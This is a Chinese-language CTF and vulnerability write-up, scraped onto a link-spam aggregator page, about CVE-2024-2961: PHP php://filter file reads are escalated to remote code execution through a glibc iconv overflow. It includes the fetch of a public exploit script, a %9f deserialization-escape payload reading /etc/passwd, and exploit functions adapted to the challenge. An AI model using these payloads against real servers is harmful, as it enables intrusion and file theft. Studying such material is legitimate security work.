当前位置: 首页 > news >正文

网站与数据库的联系湖北省建设厅网站资质

网站与数据库的联系,湖北省建设厅网站资质,网站开发网页ui设计公司,张北北京网站建设简单介绍 PHP利用glibc iconv()中的一个缓冲区溢出漏洞#xff0c;实现将文件读取提升为任意命令执行漏洞 在php读取文件的时候可以使用 php://filter伪协议利用 iconv 函数, 从而可以利用该漏洞进行 RCE 漏洞的利用场景 PHP的所有标准文件读取操作都受到了影响#xff1…简单介绍 PHP利用glibc iconv()中的一个缓冲区溢出漏洞实现将文件读取提升为任意命令执行漏洞 在php读取文件的时候可以使用 php://filter伪协议利用 iconv 函数, 从而可以利用该漏洞进行 RCE 漏洞的利用场景 PHP的所有标准文件读取操作都受到了影响file_get_contents()、file()、readfile()、fgets()、getimagesize()、SplFileObject-read()等。文件写入操作同样受到影响如file_put_contents()及其同类函数. 其他利用场景; 其他文件读写相关操作只要支持php://filter伪协议都可以利用。包括XXE、new $_GET[cls]($_GET[argument]);这种场景都可以使用这个trick进行利用 简单复现利用 vulhub复现地址:https://github.com/vulhub/vulhub/tree/master/php/CVE-2024-2961 搭建好后打开会发现有一个报错, 因为开始我们的file是没有传参的, 所以稍微修改一下index.php的内容 ?php if(isset($_POST[file])){ $data file_get_contents($_POST[file]); echo File contents: $data;}可以发现是可以进行读取文件的, 接下来就是尝试进行RCE的利用了 安装依赖 需要有python3的环境 pip install pwntools pip install https://github.com/cfreal/ten/archive/refs/heads/main.zip然后从https://raw.githubusercontent.com/ambionics/cnext-exploits/main/cnext-exploit.py地址下载POC并执行 wget https://raw.githubusercontent.com/ambionics/cnext-exploits/main/cnext-exploit.py 然后访问网站相应的路由就可以进行 RCE了 CTFshow 西瓜杯 Ezzz_php ?php highlight_file(__FILE__); error_reporting(0); function substrstr($data) {$start mb_strpos($data, [);$end mb_strpos($data, ]);return mb_substr($data, $start 1, $end - 1 - $start); } class read_file{public $start;public $filename/etc/passwd;public function __construct($start){$this-start$start;}public function __destruct(){if($this-start gxngxngxn){echo What you are reading is:.file_get_contents($this-filename);}} } if(isset($_GET[start])){$readfile new read_file($_GET[start]);$readisset($_GET[read])?$_GET[read]:I_want_to_Read_flag;if(preg_match(/\[|\]/i, $_GET[read])){die(NONONO!!!);}$ctf substrstr($read.[.serialize($readfile).]);unserialize($ctf); }else{echo Start_Funny_CTF!!!; }审计代码, 我们最终需要利用到 file_get_contents函数 从文件读取到RCE 前面就是php的反序列化逃逸的问题 利用 mb_substr和mb_strpos 执行存在差异去绕过 简单说就是 %9f可以造成字符串往后移动一位因为它不解析%f0可以把字符串吞掉前三位 %f0配合任意的三个字符结合%9f就可以达到字符串逃逸 具体可以看:https://www.cnblogs.com/gxngxngxn/p/18187578通过构造payload可以进行一个任意文件的读取 ?startaaaaaaaaaaread%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9f%9fO:9:read_file:2:{s:5:start;s:9:gxngxngxn;s:8:filename;s:11:/etc/passwd;}接下来就是 将任意文件读取提升为远程代码执行 利用原作者的exp, 修改一下send和download即可 def send(self, path: str) - Response:Sends given path to the HTTP server. Returns the response.payload_file O:9:read_file:2:{s:5:start;s:9:gxngxngxn;s:8:filename;s: str(len(path)) : path ;}payload %9f * (len(payload_file) 1) payload_file.replace(,%2b)filename_len a * (len(path) 10)url self.urlf?start{filename_len}read{payload}return self.session.get(url)def download(self, path: str) - bytes:Returns the contents of a remote file.path fphp://filter/convert.base64-encode/resource{path}response self.send(path)data response.re.search(bWhat you are reading is:(.*), flagsre.S).group(1)return base64.decode(data)访问到相应路由执行命令 参考文章 https://xz.aliyun.com/t/15549?time__1311Gqjxn7itGQeWqGNDQiiQGkDuW1wfhTbnbDu_atoken147e8471b0a897eb857599898fc3e5aeu_asig0a472f9217315824068385990e003a
http://www.dnsts.com.cn/news/132315.html

相关文章:

  • 完整网站开发教程小程序代理合同范本
  • 宜都网站制作湖南网站建设服务
  • 有人用dw做网站吗网站异常传播怎么解除
  • 创业做网站失败cms开发框架
  • 做旅游网站宣传大学网页制作与网站建设
  • 福田做网站报价建设银行的网站进不去怎么办
  • 做自己网站做站长小程序代码怎么获取
  • 企业自建网站平台有哪些怎么创造自己的公众号
  • 健康资讯网源码 养生保健网站源码(织梦dedecms5.7wordpress后台反应慢
  • asp.net 企业网站后台管理系统源码做网站注册验证码
  • 郑州网站推广优化报价燃灯seo
  • 优酷的网站头怎么做的微网站如何做推广方案
  • seo网站优化怎么做做企业网站怎么样
  • 顺德龙江网站建设沈阳网站优化推广方案
  • 网站建设 办公系统加盟招商网站建设
  • 福州专业网站制作定制网站建设公司哪家便宜
  • 手机网站商场建设ui设计去什么公司好
  • 北京公司网站建设费用企业网络拓扑图及配置
  • 响应式网站服务网站开发虚拟主机管理系统
  • 大浪网站建设网站如何做百度搜索优化
  • 网站站外优化怎么做wordpress展示主题
  • 南昌网站建设讯息iis7.5 wordpress
  • 湘西网站建设花垣网站框架一般用什么做
  • 有哪些网站做的比较好苏州注册公司好快记财务
  • 吉林省建设厅网站市政建设多元国际二维码图片
  • 怀来县网站建设网站主编 做啥
  • 深圳东风大厦 网站建设温州网站建设方案推广
  • 吉林省网站建设软文广告投放平台
  • 网站建设资金预算怎样做网站赚流量
  • 长沙电商网站网站性能优化方法